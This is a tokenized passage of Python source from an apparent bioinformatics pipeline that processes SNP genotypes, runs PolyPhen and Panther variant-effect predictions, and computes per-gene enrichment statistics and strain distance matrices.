[ ] <EOL> for h , genotype_info in zip ( headers , data [ <NUM_LIT:9> : ] ) : <EOL> if genotype_info == "<STR_LIT:.>" or genotype_info . startswith ( "<STR_LIT>" ) : <EOL> output_genotype = "<STR_LIT:1>" <EOL> else : <EOL> consensus_quality , genotype_quality , read_depth = "<STR_LIT:0>" , "<STR_LIT:0>" , "<STR_LIT:0>" <EOL> dd = genotype_info . split ( "<STR_LIT::>" ) <EOL> if len ( dd ) == <NUM_LIT:5> : <EOL> genotype , mapping_quality , hcg , genotype_quality , read_depth = dd <EOL> if hcg != "<STR_LIT:1>" : output_genotype = "<STR_LIT:?>" <EOL> elif len ( dd ) == <NUM_LIT:4> : <EOL> genotype , mapping_quality , genotype_quality , read_depth = dd <EOL> elif len ( dd ) == <NUM_LIT:2> : <EOL> genotype , genotype_quality = dd <EOL> elif len ( dd ) == <NUM_LIT:1> : <EOL> genotype = dd [ <NUM_LIT:0> ] <EOL> else : <EOL> raise ValueError ( "<STR_LIT>" % ( genotype_info , line ) ) <EOL> genotype = genotype . split ( "<STR_LIT:/>" ) <EOL> if len ( set ( genotype ) ) != <NUM_LIT:1> : <EOL> output_genotype = "<STR_LIT:h>" <EOL> else : <EOL> genotype = list ( genotype ) [ <NUM_LIT:0> ] <EOL> output_genotype = int ( genotype ) + <NUM_LIT:1> <EOL> output_genotypes . append ( output_genotype ) <EOL> counts . output += <NUM_LIT:1> <EOL> outf . write ( "<STR_LIT>" % ( contig , pos , "<STR_LIT:\t>" . join ( map ( str , output_genotypes ) ) ) ) <EOL> outf . close ( ) <EOL> E . info ( "<STR_LIT:%s>" % str ( counts ) ) <EOL> @ files ( ( ( PARAMS [ "<STR_LIT>" ] , "<STR_LIT>" ) , ) ) <EOL> def exportFunctionalVariantTable ( infile , outfile ) : <EOL> '''<STR_LIT>''' <EOL> headers = [ ] <EOL> ninput = <NUM_LIT:0> <EOL> counts = E . Counter ( ) <EOL> dbhandle = sqlite3 . connect ( PARAMS [ "<STR_LIT>" ] ) <EOL> cc = dbhandle . cursor ( ) <EOL> tracks = [ x [ <NUM_LIT:0> ] for x in cc . execute ( "<STR_LIT>" ) . fetchall ( ) ] <EOL> map_track2column = dict ( [ ( x [ <NUM_LIT:1> ] , x [ <NUM_LIT:0> ] ) for x in enumerate ( tracks ) ] ) <EOL> statement = '''<STR_LIT>''' <EOL> ncolumns = len ( tracks ) <EOL> outf = IOTools . openFile ( outfile , "<STR_LIT:w>" ) <EOL> outf . write ( "<STR_LIT>" % "<STR_LIT:\t>" . join ( tracks ) ) <EOL> for locus_id , data in itertools . groupby ( cc . execute ( statement ) , key = lambda x : x [ <NUM_LIT:0> ] ) : <EOL> row = [ "<STR_LIT:w>" ] * ncolumns <EOL> for x , track , contig , pos , prediction in data : <EOL> if prediction in '<STR_LIT>' or '<STR_LIT>' : <EOL> row [ map_track2column [ track ] ] = "<STR_LIT:d>" <EOL> elif prediction_id == "<STR_LIT>" : <EOL> row [ map_track2column [ track ] ] = "<STR_LIT:u>" <EOL> elif prediction_id == "<STR_LIT>" : <EOL> row [ map_track2column [ track ] ] = "<STR_LIT:b>" <EOL> outf . write ( "<STR_LIT:\t>" . join ( ( contig , str ( pos + <NUM_LIT:1> ) , "<STR_LIT:\t>" . join ( row ) ) ) + "<STR_LIT:\n>" ) <EOL> outf . close ( ) <EOL> E . info ( "<STR_LIT:%s>" % str ( counts ) ) <EOL> @ merge ( summarizeAllelesPerGene , <EOL> ( "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> ) ) <EOL> def exportKnockoutLists ( infiles , outfiles ) : <EOL> dbhandle = sqlite3 . connect ( PARAMS [ "<STR_LIT>" ] ) <EOL> outf = gzip . open ( outfiles [ <NUM_LIT:0> ] , "<STR_LIT:w>" ) <EOL> headers = ( "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" ) <EOL> outf . write ( "<STR_LIT>" % "<STR_LIT:\t>" . join ( headers ) ) <EOL> for infile in infiles : <EOL> track = infile [ : - len ( "<STR_LIT>" ) ] <EOL> strain = track [ : - len ( "<STR_LIT>" ) ] <EOL> statement = '''<STR_LIT>''' % locals ( ) <EOL> outf . write ( "<STR_LIT:\n>" . join ( [ "<STR_LIT:\t>" . join ( map ( str , x ) ) for x in Database . executewait ( dbhandle , statement ) . fetchall ( ) ] ) + "<STR_LIT:\n>" ) <EOL> outf . close ( ) <EOL> headers = ( "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" ) <EOL> outf = gzip . open ( outfiles [ <NUM_LIT:1> ] , "<STR_LIT:w>" ) <EOL> outf . write ( "<STR_LIT>" % "<STR_LIT:\t>" . join ( headers ) ) <EOL> columns = [ "<STR_LIT>" % t for t in TRACKS ] <EOL> fields = "<STR_LIT:U+002C>" . join ( columns ) <EOL> statement = '''<STR_LIT>''' % locals ( ) <EOL> data = list ( dbhandle . execute ( statement ) ) <EOL> d = dict ( zip ( [ "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" ] + columns , zip ( * data ) ) ) <EOL> c = [ ] <EOL> for x in range ( len ( d [ "<STR_LIT>" ] ) ) : <EOL> s = [ ] <EOL> for t in TRACKS : <EOL> if d [ "<STR_LIT>" % t ] [ x ] != <NUM_LIT:0> : s . append ( t ) <EOL> c . append ( "<STR_LIT:U+002C>" . join ( s ) ) <EOL> for t in TRACKS : del d [ "<STR_LIT>" % t ] <EOL> for d , strains in zip ( data , c ) : <EOL> outf . write ( "<STR_LIT:\t>" . join ( map ( str , d [ : <NUM_LIT:3> ] ) ) + "<STR_LIT>" % strains ) <EOL> outf . close ( ) <EOL> @ merge ( "<STR_LIT>" , "<STR_LIT>" ) <EOL> def buildPolyphenInput ( infiles , outfile ) : <EOL> '''<STR_LIT>''' <EOL> statement = '''<STR_LIT>''' <EOL> dbhandle = sqlite3 . connect ( PARAMS [ "<STR_LIT>" ] ) <EOL> cc = dbhandle . cursor ( ) <EOL> infiles . sort ( ) <EOL> map_transcript2id = dict ( <EOL> cc . execute ( "<STR_LIT>" ) . fetchall ( ) ) <EOL> total_counts = E . Counter ( ) <EOL> notfound , found = set ( ) , set ( ) <EOL> outf_map = open ( outfile + "<STR_LIT>" , "<STR_LIT:w>" ) <EOL> outf_map . write ( "<STR_LIT>" ) <EOL> outf = open ( outfile , "<STR_LIT:w>" ) <EOL> snps = { } <EOL> locus_ids = { } <EOL> for infile in infiles : <EOL> table = P . toTable ( infile ) <EOL> track = table [ : - len ( "<STR_LIT>" ) ] <EOL> cc . execute ( statement % locals ( ) ) <EOL> counts = E . Counter ( ) <EOL> snp_id = <NUM_LIT:0> <EOL> for transcript_id , cds_start , cds_end , orig_codons , variant_codons , orig_na , variant_na , contig , pos in cc : <EOL> counts . input += <NUM_LIT:1> <EOL> if transcript_id not in map_transcript2id : <EOL> notfound . add ( transcript_id ) <EOL> counts . not_found += <NUM_LIT:1> <EOL> continue <EOL> if "<STR_LIT:U+002C>" in variant_codons : <EOL> counts . heterozygous += <NUM_LIT:1> <EOL> continue <EOL> for phase in range ( <NUM_LIT:0> , <NUM_LIT:3> ) : <EOL> if orig_na [ phase ] . lower ( ) != variant_na [ phase ] . lower ( ) : <EOL> break <EOL> pid = map_transcript2id [ transcript_id ] <EOL> peptide_pos = int ( math . floor ( cds_start / <NUM_LIT> ) ) + <NUM_LIT:1> <EOL> key = "<STR_LIT>" % ( pid , peptide_pos , variant_codons ) <EOL> if key in snps : <EOL> snp_id = snps [ key ] <EOL> else : <EOL> snp_id = len ( snps ) <EOL> snps [ key ] = snp_id <EOL> outf . write ( "<STR_LIT>" % ( snp_id , <EOL> pid , <EOL> peptide_pos , <EOL> orig_codons , <EOL> variant_codons , <EOL> ) ) <EOL> counts . output += <NUM_LIT:1> <EOL> locus_key = "<STR_LIT>" % ( contig , pos , variant_codons ) <EOL> if locus_key not in locus_ids : <EOL> locus_ids [ locus_key ] = len ( locus_ids ) <EOL> outf_map . write ( "<STR_LIT>" % ( snp_id , <EOL> track , <EOL> transcript_id , <EOL> pid , <EOL> peptide_pos - <NUM_LIT:1> , <EOL> locus_ids [ locus_key ] , <EOL> contig , <EOL> pos , <EOL> phase ) ) <EOL> found . add ( transcript_id ) <EOL> total_counts += counts <EOL> E . info ( "<STR_LIT>" % ( table , str ( counts ) ) ) <EOL> outf . close ( ) <EOL> outf_map . close ( ) <EOL> E . info ( "<STR_LIT>" % ( table , <EOL> len ( found ) , <EOL> len ( notfound ) ) ) <EOL> E . info ( "<STR_LIT>" % ( str ( total_counts ) , len ( snps ) , len ( locus_ids ) ) ) <EOL> if notfound : <EOL> E . warn ( "<STR_LIT>" % len ( notfound ) ) <EOL> E . warn ( "<STR_LIT>" % "<STR_LIT:U+002C>" . join ( notfound ) ) <EOL> statement = '''<STR_LIT>''' <EOL> P . run ( ) <EOL> @ transform ( buildPolyphenInput , suffix ( "<STR_LIT>" ) , "<STR_LIT>" ) <EOL> def buildPolyphenFeatures ( infile , outfile ) : <EOL> '''<STR_LIT>''' <EOL> nsnps = len ( [ x for x in open ( infile ) ] ) <EOL> to_cluster = True <EOL> stepsize = max ( int ( nsnps / <NUM_LIT> ) , <NUM_LIT:1000> ) <EOL> job_array = ( <NUM_LIT:0> , nsnps , stepsize ) <EOL> E . info ( "<STR_LIT>" % nsnps ) <EOL> scratchdir = os . path . join ( os . path . abspath ( "<STR_LIT:.>" ) , "<STR_LIT>" ) <EOL> try : <EOL> os . mkdir ( scratchdir ) <EOL> except OSError : <EOL> pass <EOL> resultsdir = outfile + "<STR_LIT>" <EOL> try : <EOL> os . mkdir ( resultsdir ) <EOL> except OSError : <EOL> pass <EOL> statement = '''<STR_LIT>''' <EOL> P . run ( ) <EOL> to_cluster = False <EOL> job_array = None <EOL> statement = '''<STR_LIT>''' <EOL> P . run ( ) <EOL> statement = '''<STR_LIT>''' <EOL> P . run ( ) <EOL> @ files ( [ ( buildPolyphenFeatures , "<STR_LIT>" % x , x ) for x in P . asList ( PARAMS [ "<STR_LIT>" ] ) ] ) <EOL> def runPolyphen ( infile , outfile , model ) : <EOL> '''<STR_LIT>''' <EOL> to_cluster = True <EOL> statement = '''<STR_LIT>''' <EOL> P . run ( ) <EOL> @ transform ( buildPolyphenInput , suffix ( "<STR_LIT>" ) , "<STR_LIT>" ) <EOL> def loadPolyphenMap ( infile , outfile ) : <EOL> '''<STR_LIT>''' <EOL> table = P . toTable ( outfile ) <EOL> statement = '''<STR_LIT>''' <EOL> P . run ( ) <EOL> @ transform ( runPolyphen , suffix ( "<STR_LIT>" ) , "<STR_LIT>" ) <EOL> def loadPolyphen ( infile , outfile ) : <EOL> '''<STR_LIT>''' <EOL> table = P . toTable ( outfile ) <EOL> statement = '''<STR_LIT>''' <EOL> P . run ( ) <EOL> @ transform ( loadPolyphen , suffix ( "<STR_LIT>" ) , "<STR_LIT>" ) <EOL> def analysePolyphen ( infile , outfile ) : <EOL> '''<STR_LIT>''' <EOL> table = P . toTable ( infile ) <EOL> tablename_map = "<STR_LIT>" <EOL> dbhandle = sqlite3 . connect ( PARAMS [ "<STR_LIT>" ] ) <EOL> cc = dbhandle . cursor ( ) <EOL> statement = '''<STR_LIT>''' % locals ( ) <EOL> data = cc . execute ( statement ) . fetchall ( ) <EOL> statement = '''<STR_LIT>''' <EOL> gene_ids = cc . execute ( statement ) . fetchall ( ) <EOL> total_nsnps = sum ( [ x [ <NUM_LIT:1> ] for x in data ] ) <EOL> total_ndel = sum ( [ x [ <NUM_LIT:2> ] for x in data ] ) <EOL> total_length = sum ( [ x [ <NUM_LIT:1> ] for x in gene_ids ] ) <EOL> del_p = float ( total_ndel ) / total_nsnps <EOL> len_p = float ( total_nsnps ) / total_length <EOL> com_p = float ( total_ndel ) / total_length <EOL> E . info ( "<STR_LIT>" % ( total_ndel , total_nsnps , del_p ) ) <EOL> E . info ( "<STR_LIT>" % ( total_nsnps , total_length , len_p ) ) <EOL> E . info ( "<STR_LIT>" % ( total_ndel , total_length , com_p ) ) <EOL> outf = open ( outfile , "<STR_LIT:w>" ) <EOL> outf . write ( "<STR_LIT:\t>" . join ( ( "<STR_LIT>" , "<STR_LIT:code>" , <EOL> "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , <EOL> "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , <EOL> "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , <EOL> "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , ) ) + "<STR_LIT:\n>" ) <EOL> del_pvalues , len_pvalues , com_pvalues = [ ] , [ ] , [ ] <EOL> for gene_id , nsnps , ndel , length in data : <EOL> del_pvalues . append ( scipy . stats . binom . sf ( ndel - <NUM_LIT:1> , nsnps , del_p ) ) <EOL> len_pvalues . append ( scipy . stats . binom . sf ( nsnps - <NUM_LIT:1> , int ( round ( length ) ) , len_p ) ) <EOL> com_pvalues . append ( scipy . stats . binom . sf ( ndel - <NUM_LIT:1> , int ( round ( length ) ) , com_p ) ) <EOL> del_q = Stats . doFDR ( del_pvalues ) <EOL> len_q = Stats . doFDR ( len_pvalues ) <EOL> com_q = Stats . doFDR ( com_pvalues ) <EOL> fdr = PARAMS [ "<STR_LIT>" ] <EOL> found = set ( ) <EOL> for a , del_pvalue , del_qvalue , len_pvalue , len_qvalue , com_pvalue , com_qvalue in zip ( data , <EOL> del_pvalues , del_q . mQValues , <EOL> len_pvalues , len_q . mQValues , <EOL> com_pvalues , com_q . mQValues , <EOL> ) : <EOL> gene_id , nsnps , ndel , length = a <EOL> found . add ( gene_id ) <EOL> del_p = float ( ndel ) / nsnps <EOL> len_p = float ( nsnps ) / length <EOL> code = "<STR_LIT>" . join ( [ str ( int ( x < fdr ) ) for x in ( del_qvalue , len_qvalue , com_qvalue ) ] ) <EOL> outf . write ( "<STR_LIT:\t>" . join ( ( gene_id , <EOL> code , <EOL> "<STR_LIT>" % int ( round ( length ) ) , <EOL> "<STR_LIT>" % int ( nsnps ) , <EOL> "<STR_LIT>" % int ( ndel ) , <EOL> "<STR_LIT>" % del_p , <EOL> "<STR_LIT>" % del_pvalue , <EOL> "<STR_LIT>" % del_qvalue , <EOL> "<STR_LIT>" % len_p , <EOL> "<STR_LIT>" % len_pvalue , <EOL> "<STR_LIT>" % len_qvalue , <EOL> "<STR_LIT>" % com_p , <EOL> "<STR_LIT>" % com_pvalue , <EOL> "<STR_LIT>" % com_qvalue , <EOL> ) ) + "<STR_LIT:\n>" ) <EOL> code = "<STR_LIT>" <EOL> for gene_id , length in gene_ids : <EOL> if gene_id in found : continue <EOL> outf . write ( "<STR_LIT:\t>" . join ( ( gene_id , <EOL> code , <EOL> "<STR_LIT>" % int ( round ( length ) ) , <EOL> "<STR_LIT>" % <NUM_LIT:0> , <EOL> "<STR_LIT>" % <NUM_LIT:0> , <EOL> "<STR_LIT>" % <NUM_LIT:0> , <EOL> "<STR_LIT>" % <NUM_LIT:1> , <EOL> "<STR_LIT>" % <NUM_LIT:1> , <EOL> "<STR_LIT>" % <NUM_LIT:0> , <EOL> "<STR_LIT>" % <NUM_LIT:1> , <EOL> "<STR_LIT>" % <NUM_LIT:1> , <EOL> "<STR_LIT>" % <NUM_LIT:0> , <EOL> "<STR_LIT>" % <NUM_LIT:1> , <EOL> "<STR_LIT>" % <NUM_LIT:1> , <EOL> ) ) + "<STR_LIT:\n>" ) <EOL> outf . close ( ) <EOL> @ transform ( analysePolyphen , suffix ( "<STR_LIT>" ) , "<STR_LIT>" ) <EOL> def loadPolyphenAnalysis ( infile , outfile ) : <EOL> '''<STR_LIT>''' <EOL> table = P . toTable ( outfile ) <EOL> statement = '''<STR_LIT>''' <EOL> P . run ( ) <EOL> @ files ( ( ( buildPeptideFasta , "<STR_LIT>" ) , ) ) <EOL> def preparePanther ( infile , outfile ) : <EOL> '''<STR_LIT>''' <EOL> to_cluster = True <EOL> if type ( infile ) in ( types . ListType , types . TupleType ) : <EOL> infile = infile [ <NUM_LIT:0> ] <EOL> tmpdir = P . getTempDir ( "<STR_LIT:.>" ) <EOL> statement = '''<STR_LIT>''' <EOL> P . run ( ) <EOL> shutil . rmtree ( tmpdir ) <EOL> @ files ( ( ( ( buildPolyphenInput , preparePanther ) , "<STR_LIT>" ) , ) ) <EOL> def runPanther ( infiles , outfile ) : <EOL> '''<STR_LIT>''' <EOL> filename_snps , filename_scores = infiles <EOL> tmpdir = P . getTempDir ( "<STR_LIT:.>" ) <EOL> peptides = PARAMS [ "<STR_LIT>" ] <EOL> tmpfilename_snps = P . getTempFilename ( "<STR_LIT:.>" ) <EOL> statement = '''<STR_LIT>''' <EOL> statement = '''<STR_LIT>''' <EOL> P . run ( ) <EOL> shutil . rmtree ( tmpdir ) <EOL> os . unlink ( tmpfilename_snps ) <EOL> @ transform ( runPanther , suffix ( "<STR_LIT>" ) , "<STR_LIT>" ) <EOL> def loadPanther ( infile , outfile ) : <EOL> '''<STR_LIT>''' <EOL> table = P . toTable ( outfile ) <EOL> statement = '''<STR_LIT>''' <EOL> P . run ( ) <EOL> @ split ( loadPolyphenMap , ( "<STR_LIT>" <EOL> , "<STR_LIT>" <EOL> , "<STR_LIT>" <EOL> , "<STR_LIT>" <EOL> , "<STR_LIT>" <EOL> ) ) <EOL> def buildSharedSNPMatrix ( infiles , outfiles ) : <EOL> '''<STR_LIT>''' <EOL> dbhandle = sqlite3 . connect ( PARAMS [ "<STR_LIT>" ] ) <EOL> cc = dbhandle . cursor ( ) <EOL> segregating_sites = cc . execute ( '<STR_LIT>' ) . fetchone ( ) [ <NUM_LIT:0> ] <EOL> statement = '''<STR_LIT>''' <EOL> cc . execute ( statement ) <EOL> matrix = collections . defaultdict ( int ) <EOL> for k , vals in itertools . groupby ( cc , key = lambda x : x [ <NUM_LIT:0> ] ) : <EOL> tracks = [ x [ <NUM_LIT:1> ] for x in list ( vals ) ] <EOL> for t1 in tracks : <EOL> matrix [ ( t1 , t1 ) ] += <NUM_LIT:1> <EOL> if len ( tracks ) > <NUM_LIT:1> : <EOL> for t1 , t2 in itertools . combinations ( tracks , <NUM_LIT:2> ) : <EOL> matrix [ ( t1 , t2 ) ] += <NUM_LIT:1> <EOL> matrix [ ( t2 , t1 ) ] += <NUM_LIT:1> <EOL> all_tracks = set ( [ x [ <NUM_LIT:0> ] for x in matrix . keys ( ) ] + [ x [ <NUM_LIT:1> ] for x in matrix . keys ( ) ] ) <EOL> outf = open ( outfiles [ <NUM_LIT:0> ] , "<STR_LIT:w>" ) <EOL> outf . write ( "<STR_LIT>" % "<STR_LIT:\t>" . join ( all_tracks ) ) <EOL> for track1 in all_tracks : <EOL> outf . write ( "<STR_LIT:%s>" % track1 ) <EOL> for track2 in all_tracks : <EOL> outf . write ( "<STR_LIT>" % matrix [ ( track1 , track2 ) ] ) <EOL> outf . write ( "<STR_LIT:\n>" ) <EOL> outf . close ( ) <EOL> outf = open ( outfiles [ <NUM_LIT:1> ] , "<STR_LIT:w>" ) <EOL> outf . write ( "<STR_LIT>" % "<STR_LIT:\t>" . join ( all_tracks ) ) <EOL> for track1 in all_tracks : <EOL> outf . write ( "<STR_LIT:%s>" % track1 ) <EOL> for track2 in all_tracks : <EOL> if track1 == track2 : <EOL> outf . write ( "<STR_LIT>" % <NUM_LIT:0> ) <EOL> else : <EOL> outf . write ( "<STR_LIT>" % ( segregating_sites - matrix [ ( track1 , track2 ) ] ) ) <EOL> outf . write ( "<STR_LIT:\n>" ) <EOL> outf . close ( ) <EOL> outf = open ( outfiles [ <NUM_LIT:2> ] , "<STR_LIT:w>" ) <EOL> outf . write ( "<STR_LIT>" % "<STR_LIT:\t>" . join ( all_tracks ) ) <EOL> pids = { } <EOL> for track1 in all_tracks : <EOL> outf . write ( "<STR_LIT:%s>" % track1 ) <EOL> for track2 in all_tracks : <EOL> a = segregating_sites - ( matrix [ ( track1 , track1 ) ] + matrix [ ( track2 , track2 ) ] - <NUM_LIT:2> * matrix [ ( track1 , track2 ) ] ) <EOL> pid = <NUM_LIT> * a / segregating_sites <EOL> outf . write ( "<STR_LIT>" % pid ) <EOL> pids [ ( track1 , track2 ) ] = pid <EOL> outf . write ( "<STR_LIT:\n>" ) <EOL> outf . close ( ) <EOL> outf = open ( outfiles [ <NUM_LIT:3> ] , "<STR_LIT:w>" ) <EOL> outf . write ( "<STR_LIT>" % "<STR_LIT:\t>" . join ( all_tracks ) ) <EOL> for track1 in all_tracks : <EOL> outf . write ( "<STR_LIT:%s>" % track1 ) <EOL> for track2 in all_tracks : <EOL> val = <NUM_LIT> - pids [ ( track1 , track2 ) ] <EOL> outf . write ( "<STR_LIT>" % val ) <EOL> outf . write ( "<STR_LIT:\n>" ) <EOL> outf . close ( ) <EOL> outfile_distance , outfile_tree = outfiles [ <NUM_LIT:3> ] , outfiles [ <NUM_LIT:4> ] <EOL> statement = '''<STR_LIT>''' <EOL> P . run ( ) <EOL> @ files ( ( ( None , "<STR_LIT>" , "<STR_LIT>" ) , <EOL> ( None , "<STR_LIT>" , "<STR_LIT>" ) , <EOL> ) ) <EOL> def buildQTLWorkspaces ( infile , outfile , workspace ) : <EOL> PEnrichment . buildWorkSpace ( outfile , workspace ) <EOL> @ files ( ( ( "<STR_LIT>" % PARAMS [ "<STR_LIT>" ] , "<STR_LIT>" ) , ) ) <EOL> def buildEnrichmentIsochores ( infile , outfile ) : <EOL> PEnrichment . buildIsochoresGC ( infile , outfile ) <EOL> @ follows ( mkdir ( "<STR_LIT>" ) , loadPolyphen , loadPolyphenMap ) <EOL> @ transform ( "<STR_LIT>" , <EOL> regex ( "<STR_LIT>" ) , <EOL> r"<STR_LIT>" ) <EOL> def buildDeleteriousSNPs ( infile , outfile ) : <EOL> track = infile [ : - len ( "<STR_LIT>" ) ] <EOL> outf = gzip . open ( outfile , "<STR_LIT:w>" ) <EOL> outf . write ( "<STR_LIT>" % track ) <EOL> dbhandle = sqlite3 . connect ( PARAMS [ "<STR_LIT>" ] ) <EOL> cc = dbhandle . cursor ( ) <EOL> statement = '''<STR_LIT>''' % locals ( ) <EOL> cc . execute ( statement ) <EOL> for contig , pos in cc : <EOL> outf . write ( "<STR_LIT>" % ( contig , pos , pos + <NUM_LIT:1> ) ) <EOL> outf . close ( ) <EOL> @ follows ( mkdir ( "<STR_LIT>" ) , loadPolyphen , loadPolyphenMap ) <EOL> @ transform ( "<STR_LIT>" , <EOL> regex ( "<STR_LIT>" ) , <EOL> r"<STR_LIT>" ) <EOL> def buildBenignSNPs ( infile , outfile ) : <EOL> track = infile [ : - len ( "<STR_LIT>" ) ] <EOL> outf = gzip . open ( outfile , "<STR_LIT:w>" ) <EOL> outf . write ( "<STR_LIT>" % track ) <EOL> dbhandle = sqlite3 . connect ( PARAMS [ "<STR_LIT>" ] ) <EOL> cc = dbhandle . cursor ( ) <EOL> statement = '''<STR_LIT>''' % locals ( ) <EOL> cc . execute ( statement ) <EOL> for contig , pos in cc : <EOL> outf . write ( "<STR_LIT>" % ( contig , pos , pos + <NUM_LIT:1> ) ) <EOL> outf . close ( ) <EOL> @ merge ( ( buildBenignSNPs , buildDeleteriousSNPs ) , <EOL> ( "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , ) , <EOL> ) <EOL> def mergeSNPs ( infiles , outfiles ) : <EOL> tmp1 = P . getTempFilename ( ) <EOL> tmp2 = P . getTempFilename ( ) <EOL> statement = '''<STR_LIT>''' <EOL> P . run ( ) <EOL> statement = '''<STR_LIT>''' <EOL> P . run ( ) <EOL> statement = '''<STR_LIT>''' <EOL> P . run ( ) <EOL> statement = '''<STR_LIT>''' <EOL> P . run ( ) <EOL> statement = '''<STR_LIT>''' <EOL> P . run ( ) <EOL> statement = '''<STR_LIT>''' <EOL> P . run ( ) <EOL> os . unlink ( tmp1 ) <EOL> os . unlink ( tmp2 ) <EOL> @ merge ( ( buildBenignSNPs , buildDeleteriousSNPs ) , <EOL> "<STR_LIT>" ) <EOL> def buildSNPDensityIsochores ( infile , outfile ) : <EOL> '''<STR_LIT>''' <EOL> statement = '''<STR_LIT>''' <EOL> P . run ( ) <EOL> statement = '''<STR_LIT>''' <EOL> P . run ( ) <EOL> @ merge ( [ "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> ] , "<STR_LIT>" ) <EOL> def QTLSummary ( infiles , outfile ) : <EOL> for infile in infiles : <EOL> basename = os . path . basename ( infile ) <EOL> statement = '''<STR_LIT>''' <EOL> P . run ( ) <EOL> @ follows ( buildQTLWorkspaces ) <EOL> @ merge ( ( buildDeleteriousSNPs , buildBenignSNPs , mergeSNPs ) , "<STR_LIT>" ) <EOL> def runGATOnQTLs ( infiles , outfile ) : <EOL> '''<STR_LIT>''' <EOL> segments = IOTools . flatten ( infiles ) <EOL> workspaces = [ "<STR_LIT>" , ] <EOL> annotations = [ "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> ] <EOL> workspaces = "<STR_LIT:U+0020>" . join ( [ "<STR_LIT>" % x for x in workspaces ] ) <EOL> annotations = "<STR_LIT:U+0020>" . join ( [ "<STR_LIT>" % x for x in annotations ] ) <EOL> segments = "<STR_LIT:U+0020>" . join ( [ "<STR_LIT>" % x for x in segments ] ) <EOL> to_cluster = True <EOL> job_options = "<STR_LIT>" <EOL> statement = '''<STR_LIT>''' <EOL> P . run ( ) <EOL> @ follows ( buildQTLWorkspaces ) <EOL> @ merge ( mergeSNPs , "<STR_LIT>" ) <EOL> def runGATOnQTLsSmall ( infiles , outfile ) : <EOL> '''<STR_LIT>''' <EOL> segments = IOTools . flatten ( infiles ) <EOL> workspaces = [ "<STR_LIT>" , ] <EOL> annotations = [ "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> ] <EOL> workspaces = "<STR_LIT:U+0020>" . join ( [ "<STR_LIT>" % x for x in workspaces ] ) <EOL> annotations = "<STR_LIT:U+0020>" . join ( [ "<STR_LIT>" % x for x in annotations ] ) <EOL> segments = "<STR_LIT:U+0020>" . join ( [ "<STR_LIT>" % x for x in segments ] ) <EOL> to_cluster = True <EOL> job_options = "<STR_LIT>" <EOL> statement = '''<STR_LIT>''' <EOL> P . run ( ) <EOL> @ transform ( ( runGATOnQTLs , ) , suffix ( "<STR_LIT>" ) , "<STR_LIT>" ) <EOL> def loadGATOnQTLs ( infile , outfile ) : <EOL> table = P . toTable ( outfile ) <EOL> statement = '''<STR_LIT>''' <EOL> P . run ( ) <EOL> stat_files = glob . glob ( "<STR_LIT>" ) <EOL> for stat_file in stat_files : <EOL> basename = os . path . basename ( stat_file ) <EOL> table = os . path . splitext ( basename ) [ <NUM_LIT:0> ] <EOL> statement = '''<STR_LIT>''' <EOL> P . run ( ) <EOL> def correlateExpressionAndNMD ( infiles , outfile , join_field = "<STR_LIT>" ) : <EOL> dbhandle = sqlite3 . connect ( PARAMS [ "<STR_LIT>" ] ) <EOL> columns = Database . getColumnNames ( dbhandle , "<STR_LIT>" ) <EOL> outf = open ( outfile , "<STR_LIT:w>" ) <EOL> outf . write ( "<STR_LIT>" % ( join_field , Stats . Summary ( ) . getHeader ( ) ) ) <EOL> knockouts = set ( ) <EOL> expressed = set ( ) <EOL> for infile in infiles : <EOL> table = P . toTable ( infile ) <EOL> if table . endswith ( "<STR_LIT>" ) : <EOL> track = table [ : - len ( "<STR_LIT>" ) ] <EOL> elif table . endswith ( "<STR_LIT>" ) : <EOL> track = table [ : - len ( "<STR_LIT>" ) ] <EOL> cols = [ x for x in columns if re . search ( track , x ) ] <EOL> if len ( cols ) == <NUM_LIT:0> : <EOL> E . warn ( "<STR_LIT>" % track ) <EOL> continue <EOL> where = "<STR_LIT>" . join ( [ "<STR_LIT>" % x for x in cols ] ) <EOL> fields = "<STR_LIT:U+002C>" . join ( cols ) <EOL> statement = '''<STR_LIT>''' % locals ( ) <EOL> result = set ( list ( Database . executewait ( dbhandle , statement ) ) ) <EOL> knockouts . update ( result ) <EOL> nknockouts = len ( result ) <EOL> statement = '''<STR_LIT>''' % locals ( ) <EOL> result = list ( Database . executewait ( dbhandle , statement ) ) <EOL> nexpressed = len ( result ) <EOL> E . info ( "<STR_LIT>" % ( track , nknockouts , nexpressed ) ) <EOL> expressed . update ( set ( [ x [ <NUM_LIT:0> ] for x in result ] ) ) <EOL> for gene_id , grouper in itertools . groupby ( result , key = lambda x : x [ <NUM_LIT:0> ] ) : <EOL> gg = list ( grouper ) <EOL> s = [ item for sublist in gg for item in sublist [ <NUM_LIT:1> : ] ] <EOL> outf . write ( "<STR_LIT:\t>" . join ( ( track , gene_id , str ( Stats . Summary ( s ) ) ) ) + "<STR_LIT:\n>" ) <EOL> outf . close ( ) <EOL> E . info ( "<STR_LIT>" % ( len ( knockouts ) , len ( expressed ) ) ) <EOL> @ follows ( loadExpressionData ) <EOL> @ merge ( summarizeAllelesPerTranscript , "<STR_LIT>" ) <EOL> def correlateExpressionAndNMDByTranscript ( infiles , outfile ) : <EOL> correlateExpressionAndNMD ( infiles , outfile , join_field = "<STR_LIT>" ) <EOL> @ follows ( loadExpressionData ) <EOL> @ merge ( summarizeAllelesPerGene , "<STR_LIT>" ) <EOL> def correlateExpressionAndNMDByGene ( infiles , outfile ) : <EOL> correlateExpressionAndNMD ( infiles , outfile , join_field = "<STR_LIT>" ) <EOL> @ transform ( ( correlateExpressionAndNMDByTranscript , correlateExpressionAndNMDByGene ) , <EOL> suffix ( "<STR_LIT>" ) , <EOL> "<STR_LIT>" ) <EOL> def 